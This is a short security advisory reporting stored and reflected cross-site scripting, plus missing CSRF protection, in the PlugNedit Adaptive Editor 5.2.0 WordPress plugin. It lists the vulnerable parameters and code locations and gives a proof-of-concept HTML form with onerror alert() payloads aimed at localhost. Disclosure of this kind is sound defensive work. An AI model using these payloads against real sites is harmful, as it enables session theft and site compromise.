Hello,

Plugin: PlugNedit Adaptive Editor 5.2.0 https://wordpress.org/plugins/plugnedit/

1. Persistent and Reflected Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can store/inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load

Vulnerable parameters for reflected: PlugneditBGColor, PlugneditEditorMargin, plugneditcontent

Vulnerable parameters for persistent (stored in plugin options): plugnedit_width, pnemedcount, etc.

Example PHP callstack:

PnEPageBuilder   [/plugnedit/pagebuilder.php:444]

Verification (some reflected, some persistent):

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=plugnedit%2Fpagebuilder.php" />

<input type="text" name="PlugneditBGColor" value='"><img src=x onerror=alert(1) />' />

<input type="text" name="PlugneditEditorMargin" value='"><img src=x onerror=alert(2) />' />

<input type="text" name="plugnedit_width" value='"><img src=x onerror=alert(4) />' />

<input type="text" name="pnemedcount" value='"><img src=x onerror=alert(5) />' />

<input type="submit" name="submit" />

</form>

--

Other possible XSS:

do_pPlugnedit   [/plugnedit/PNEBlogBuilder.php:247]

do_pPlugnedit   [/plugnedit/PNEBlogBuilder.php:271]